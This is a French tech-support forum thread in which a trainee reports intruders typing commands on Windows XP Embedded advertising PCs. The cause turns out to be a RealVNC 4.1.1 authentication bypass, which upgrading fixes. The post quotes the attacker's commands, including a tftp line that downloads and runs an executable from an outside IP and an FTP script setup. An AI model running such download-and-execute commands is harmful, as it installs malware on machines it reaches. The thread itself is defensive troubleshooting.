[BackDoor] Ligne de commande

Résolu
Theartemis Messages postés 13 Statut Membre -  
 Utilisateur anonyme -
Bonjour, je suis en formation Maintenance et support informatique dans une petite boite de communication audiovisuelle, nous fournissons à nos clients des PC servant à la diffusion de message publicitaires dans leurs officines.

Ces PC sont conçus par une boite externe et le système d'exploitation est une version de Windows XP Embedded fourni par le propriétaire de notre solution de diffusion.

Nous nous chargeons juste de paramètrer le réseau des clients, d'installer VNC et d'activer le logiciel de diffusion, nous envoyons ensuite la station au client qui la branche sur son modem (paramétré par nous également) afin de pouvoir mettre à jour leurs messages publicitaires depuis les locaux de notre entreprise.

Nous avons un problème sur les deux dernières stations livrées, la diffusion se fait sous une session utilisateur restreinte (Pas d'explorer, juste accès au panneau de controle lorsqu'on presse ctrl + alt + suppr) de temps en temps, le gestionnaire de tâche s'ouvre tout seul mais plus grave, il arrive aussi que le gestionnaire de ligne de commande s'ouvre et ces commandes sont tapées

C:\windows\system32>cmd /c echo open 83.193.60.xxx 37095 >> ik
&echo user muha haha >> ik &echo

Ces problèmes apparaissent à intervalles réguliers et sont plutôt gênant pour les clients.
Sauriez vous comment y remédier?

Merci d'avance
Cordialement.
Configuration: Windows XP
Firefox 2.0.0.3

10 réponses

  1. Utilisateur anonyme
     
    Juste une suggestion...on dirait un script qui s'ouvre!
    recherches si tu ne trouves pas ---->
    *.bat sur ces machines...dès fois qu'un petit génie s'amuse ?
    ça me paraît curieux quand même....
    ou alors quoi ? une commande en mode direct ?
    je suis :-/

    1
  2. Theartemis Messages postés 13 Statut Membre
     
    Pas de batch, un scan secuser en ligne ne donne rien.

    Par contre, pendant que je lançais le scan quelqu'un d'autre a pris la main et a tapé la commande suivante dans executer

    %comscpec% /c echo Reparing user32.dll & echo Please wait...
    & tftp -i 75.24.205.xxx get deizvrkx.exe & start deizvrkx&

    Le gestionnaire de ligne de com s'est ouvert, je l'ai fermé et il a abandonné.
    0
  3. Utilisateur anonyme
     
    tentative d'infection de virus ça :
    deizvrkx.exe
    tu mets un keylogger sur chaque station...(je plaisante !)
    Non...mais tu as une piste à mon avis !
    Il y a un pirate dans la place ?
    0
  4. Theartemis Messages postés 13 Statut Membre
     
    "Il y a un pirate dans la place?"

    On dirait bien, mais on dirait aussi qu'il est négligeant...
    0
  5. Vous n’avez pas trouvé la réponse que vous recherchez ?

    Posez votre question
  6. Utilisateur anonyme
     
    D'accord, mais tu me croire qu"il a quand même quelques connaissances en la matière !!
    ce machin est un nom aléatoire--->
    deizvrkx.exe
    Je suppose qu'il n'y a pas moyen de mettre un fire-wall sur chaque machine ?

    0
  7. Theartemis Messages postés 13 Statut Membre
     
    Bin, les modems fournis sont déja equipés de firewall.

    Une CEBOX pour l'un qui est au client (Bon ok...) et l'autre est un DLINK DSL-504T

    On devrait pouvoir activer le firewall de windows mais je doute de son efficacité.
    0
  8. Utilisateur anonyme
     
    Celui de xp....une véritable passoire !
    Sinon, tu as des gratuits, qui sont pas mal.
    Zone alarm/Kerio/ en tous cas une chose est sûr...pour le moment il passe au-dessus ...et à ce train-là tu risque de te retrouver avec tous le système infecté !
    C'est ce qu'il cherche à mon avis !

    0
  9. Theartemis Messages postés 13 Statut Membre
     
    Je pense avoir résolu le problème.

    Nous utilisons Real VNC pour la télémaintenance, la version que nous utilisions jusqu'ici était la 4.1.1, or une faille permettant de prendre le contrôle du PC a distance sans utiliser de mot de passe a été déclarée en Mai 2006.

    Le passage à la 4.1.2 à apparemment résolu le problème.
    0
  10. Utilisateur anonyme
     
    ça j'ignorais, je dois dire...
    Tu veux dire que tu n'as plus de soucis de coté là ?
    0
    1. Theartemis Messages postés 13 Statut Membre
       
      Je n'ai effectivement plus de soucis.

      Enfin bon, je quitte la boite bientôt, un recommandé m'attends...

      Ils se débrouilleront si ça n'a pas résolu le problème
      0
  11. Utilisateur anonyme
     
    Bon, courage à toi.
    Cordialement.
    0